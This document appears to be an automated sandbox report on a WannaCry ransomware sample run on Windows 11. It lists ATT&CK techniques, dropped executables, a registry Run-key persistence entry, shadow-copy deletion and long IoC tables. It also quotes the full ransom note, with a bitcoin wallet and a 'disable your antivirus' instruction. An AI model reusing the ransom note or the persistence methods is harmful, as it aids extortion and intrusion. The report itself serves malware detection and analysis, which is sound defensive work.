wannacry | hxxps://archive[.]org/details/MegaHack_v7

Resubmissions

09-02-2025 20:23

250209-y59kma1qhx 3

09-02-2025 20:20

250209-y4fk6a1qct 6

09-02-2025 20:06

250209-yvl2ks1khk 10

Analysis

max time kernel
779s
max time network
780s
platform
windows11-21h2_x64
resource
win11-20250207-en
resource tags

arch:x64arch:x86image:win11-20250207-enlocale:en-usos:windows11-21h2-x64system
submitted
09-02-2025 20:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://archive.org/details/MegaHack_v7

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Wannacry family
wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD4399.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD43A0.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Executes dropped EXE 18 IoCs

pid	Process
1204	taskdl.exe
3260	@[email protected]
2720	@[email protected]
5964	taskhsvc.exe
2228	@[email protected]
6040	taskdl.exe
1912	taskse.exe
5748	@[email protected]
1580	taskse.exe
5180	taskdl.exe
2920	taskse.exe
5864	@[email protected]
5656	taskdl.exe
2000	@[email protected]
1904	taskse.exe
2932	taskse.exe
2060	@[email protected]
980	taskdl.exe

Loads dropped DLL 8 IoCs

pid	Process
5964	taskhsvc.exe
5964	taskhsvc.exe
5964	taskhsvc.exe
5964	taskhsvc.exe
5964	taskhsvc.exe
5964	taskhsvc.exe
5964	taskhsvc.exe
5964	taskhsvc.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
6140	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\lpbxtasfyybx008 = "\"C:\\Users\\Admin\\Downloads\\Ransomware.WannaCry\\tasksche.exe\""	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
468	raw.githubusercontent.com
469	raw.githubusercontent.com
467	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1387034853-841019411-4036473919-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1387034853-841019411-4036473919-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1920_1088551073\manifest.fingerprint	msedge.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1920_1088551073\InputExtractor.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1920_1088551073\manifest.json	msedge.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 35 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wermgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2812	MicrosoftEdgeUpdate.exe
3100	MicrosoftEdgeUpdate.exe
1712	MicrosoftEdgeUpdate.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe

Enumerates system info in registry 2 TTPs 11 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133836053100335016"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1387034853-841019411-4036473919-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1387034853-841019411-4036473919-1000\{67E5CD77-773D-4FDE-BB9D-3B2D303FBBB9}	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1387034853-841019411-4036473919-1000\{9B883D72-9D8B-4112-A2B7-FCC9776C9EBD}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1387034853-841019411-4036473919-1000_Classes\Local Settings	chrome.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
5344	reg.exe

NTFS ADS 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\MegaHack_v7_archive.torrent:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\MegaHack_v7_archive.torrent:Zone.Identifier	msedge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
5152	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
1528	chrome.exe
1528	chrome.exe
5380	chrome.exe
5380	chrome.exe
5380	chrome.exe
5380	chrome.exe
1764	MicrosoftEdgeUpdate.exe
1764	MicrosoftEdgeUpdate.exe
1764	MicrosoftEdgeUpdate.exe
1764	MicrosoftEdgeUpdate.exe
2776	MicrosoftEdgeUpdate.exe
2776	MicrosoftEdgeUpdate.exe
2776	MicrosoftEdgeUpdate.exe
2776	MicrosoftEdgeUpdate.exe
5964	taskhsvc.exe
5964	taskhsvc.exe
5964	taskhsvc.exe
5964	taskhsvc.exe
5964	taskhsvc.exe
5964	taskhsvc.exe
1920	msedge.exe
1920	msedge.exe
2656	chrome.exe
2656	chrome.exe
3188	msedge.exe
3188	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs

pid	Process
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1920	msedge.exe
1920	msedge.exe
2656	chrome.exe
2656	chrome.exe
2656	chrome.exe
2656	chrome.exe
2656	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe

Suspicious use of SendNotifyMessage 18 IoCs

pid	Process
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
2656	chrome.exe
2656	chrome.exe
2656	chrome.exe
2656	chrome.exe
2656	chrome.exe
2656	chrome.exe

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
1792	OpenWith.exe
3260	@[email protected]
2720	@[email protected]
3260	@[email protected]
2720	@[email protected]
2228	@[email protected]
2228	@[email protected]
5748	@[email protected]
5864	@[email protected]
2000	@[email protected]
2060	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1528 wrote to memory of 1388	1528	chrome.exe	120
PID 1528 wrote to memory of 1388	1528	chrome.exe	120
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2552	1528	chrome.exe	121
PID 1528 wrote to memory of 2072	1528	chrome.exe	122
PID 1528 wrote to memory of 2072	1528	chrome.exe	122
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123
PID 1528 wrote to memory of 2160	1528	chrome.exe	123

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2060	attrib.exe
4908	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://archive.org/details/MegaHack_v7
1⤵
PID:232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --always-read-main-dll --field-trial-handle=4264,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:1
1⤵
PID:228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --always-read-main-dll --field-trial-handle=4068,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=5432 /prefetch:1
1⤵
PID:1596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=4048,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=3768 /prefetch:14
1⤵
PID:2896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --string-annotations --always-read-main-dll --field-trial-handle=5616,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=5876 /prefetch:14
1⤵
PID:1480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --always-read-main-dll --field-trial-handle=6380,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6384 /prefetch:1
1⤵
PID:2504

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --always-read-main-dll --field-trial-handle=6608,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6540 /prefetch:1
1⤵
PID:3852

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --always-read-main-dll --field-trial-handle=6500,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6396 /prefetch:1
1⤵
PID:1848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --always-read-main-dll --field-trial-handle=6472,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6456 /prefetch:1
1⤵
PID:1176

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --always-read-main-dll --field-trial-handle=6708,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6560 /prefetch:1
1⤵
PID:3408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --always-read-main-dll --field-trial-handle=6548,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7008 /prefetch:1
1⤵
PID:1436

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
